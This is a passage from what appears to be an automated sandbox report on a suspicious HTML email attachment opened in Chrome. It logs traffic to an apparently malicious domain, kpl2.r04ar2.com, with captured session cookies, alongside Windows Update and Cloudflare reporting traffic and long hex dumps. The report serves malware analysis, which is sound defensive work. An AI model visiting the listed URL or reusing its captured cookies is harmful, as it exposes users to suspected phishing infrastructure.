                                                          2024-08-27 22:11:15 UTC1369INData Raw: 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04
                                                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                          2024-08-27 22:11:15 UTC1369INData Raw: 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08
                                                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                          2024-08-27 22:11:15 UTC1369INData Raw: 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02
                                                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                          2024-08-27 22:11:15 UTC1369INData Raw: 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04
                                                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                          2024-08-27 22:11:15 UTC1369INData Raw: 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08
                                                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          84192.168.2.449886188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:15 UTC1101OUTGET /lvytc1gAYeGHFHs4NJuMNMax70PlgNRGw39kizb HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: XSRF-TOKEN=eyJpdiI6IkI2T2dDNUQwOGtjZHgvV280cmFSMWc9PSIsInZhbHVlIjoibWFlWmRtNmxjclMwODU2cUkxVnBvZk5kZnhUc2dkMHlYN2hHUkRDYVVNWi9YL0pOQ095UG9zb3djaFdGcEg0NDlwS3VCU05wZ29IL2VoWGJYdWFDVEN1WjdONzB2NmFvZ2R3cG1ucGo2OHFJZGpYOGNGNm84TDkwYWw1OE9yTFMiLCJtYWMiOiIxMGExNzUyOTMxMWU3OThlNzUwZTNkZDVmNTEzYzY5MTc0MTM1MzM4YWUyMGVkN2I4MTg0NWViOWQ2MWQ2Y2U1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlRVZHZjVDlIL2c3dGRvVmV1K29oY1E9PSIsInZhbHVlIjoic1k1NWhINGJ4QnFrRW5HVDZzK0UzZTdvZlNITm1PNXpnNG1ZSEw2RTdJdXpjWm9XbVNsM21mNnowcEhoZUlobUlxMWFEUVNONGtseTZzVkdPb0g4dnZmeU85WGhlVWRvZVgwRmZycXZwbTdlejJIdjlsWk4zYmZrRHAwWCt1MkIiLCJtYWMiOiI5NTg3ZDMyOWI5NTY5Mzk4OThlNmY1NDk0ZjFjMjdmZGJmNTY4MjdjMTNmNzU4NmIxODBmNmM5MGQ5NWViY2UzIiwidGFnIjoiIn0%3D
                                                          2024-08-27 22:11:16 UTC579INHTTP/1.1 404 Not Found
                                                          Date: Tue, 27 Aug 2024 22:11:16 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sIxc%2BZUUEOrNpQDWB9EM7I7KmFejegSrUZkqAmRHFxitgwVo5ALHeTjQ8lJXvTyvY0hx3XK79w4PAfrQpGB%2FeUnI%2BYYGnE14edccKFBWCZEFC1LyJAV9TiVnbge89w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f6578fa270c9e-EWR
                                                          2024-08-27 22:11:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          85192.168.2.44988752.165.165.26443
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:23 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=oOFFLGOpXKGaktU&MD=FTxB8uzd HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept: */*
                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                          Host: slscr.update.microsoft.com
                                                          2024-08-27 22:11:23 UTC560INHTTP/1.1 200 OK
                                                          Cache-Control: no-cache
                                                          Pragma: no-cache
                                                          Content-Type: application/octet-stream
                                                          Expires: -1
                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                          ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                          MS-CorrelationId: c220fe7a-801d-43e4-8edd-6355954b17f9
                                                          MS-RequestId: 53c17dcb-fb40-4f3e-b883-47cf2d422b19
                                                          MS-CV: 36n+pdwkT0WoLmQF.0
                                                          X-Microsoft-SLSClientCache: 1440
                                                          Content-Disposition: attachment; filename=environment.cab
                                                          X-Content-Type-Options: nosniff
                                                          Date: Tue, 27 Aug 2024 22:11:23 GMT
                                                          Connection: close
                                                          Content-Length: 30005
                                                          2024-08-27 22:11:23 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                          Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                          2024-08-27 22:11:23 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                          Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          86192.168.2.44989135.190.80.14431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:12:06 UTC534OUTOPTIONS /report/v4?s=sIxc%2BZUUEOrNpQDWB9EM7I7KmFejegSrUZkqAmRHFxitgwVo5ALHeTjQ8lJXvTyvY0hx3XK79w4PAfrQpGB%2FeUnI%2BYYGnE14edccKFBWCZEFC1LyJAV9TiVnbge89w%3D%3D HTTP/1.1
                                                          Host: a.nel.cloudflare.com
                                                          Connection: keep-alive
                                                          Origin: https://kpl2.r04ar2.com
                                                          Access-Control-Request-Method: POST
                                                          Access-Control-Request-Headers: content-type
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-08-27 22:12:06 UTC336INHTTP/1.1 200 OK
                                                          Content-Length: 0
                                                          access-control-max-age: 86400
                                                          access-control-allow-methods: POST, OPTIONS
                                                          access-control-allow-origin: *
                                                          access-control-allow-headers: content-length, content-type
                                                          date: Tue, 27 Aug 2024 22:12:05 GMT
                                                          Via: 1.1 google
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          87192.168.2.44989235.190.80.14431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:12:06 UTC476OUTPOST /report/v4?s=sIxc%2BZUUEOrNpQDWB9EM7I7KmFejegSrUZkqAmRHFxitgwVo5ALHeTjQ8lJXvTyvY0hx3XK79w4PAfrQpGB%2FeUnI%2BYYGnE14edccKFBWCZEFC1LyJAV9TiVnbge89w%3D%3D HTTP/1.1
                                                          Host: a.nel.cloudflare.com
                                                          Connection: keep-alive
                                                          Content-Length: 855
                                                          Content-Type: application/reports+json
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-08-27 22:12:06 UTC855OUTData Raw: 5b 7b 22 61 67 65 22 3a 35 33 34 33 35 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 34 37 31 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 36 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6b 70 6c 32 2e 72 30 34 61 72 32 2e
                                                          Data Ascii: [{"age":53435,"body":{"elapsed_time":1471,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"188.114.96.3","status_code":404,"type":"http.error"},"type":"network-error","url":"https://kpl2.r04ar2.
                                                          2024-08-27 22:12:07 UTC168INHTTP/1.1 200 OK
                                                          Content-Length: 0
                                                          date: Tue, 27 Aug 2024 22:12:06 GMT
                                                          Via: 1.1 google
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to jump to process

                                                          Target ID:0
                                                          Start time:18:10:23
                                                          Start date:27/08/2024
                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\ATT60255.HTM"
                                                          Imagebase:0x7ff76e190000
                                                          File size:3'242'272 bytes
                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:2
                                                          Start time:18:10:26
                                                          Start date:27/08/2024
                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2452 --field-trial-handle=2320,i,10043383887662201719,1952149342407670854,262144 /prefetch:8
                                                          Imagebase:0x7ff76e190000
                                                          File size:3'242'272 bytes
                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          No disassembly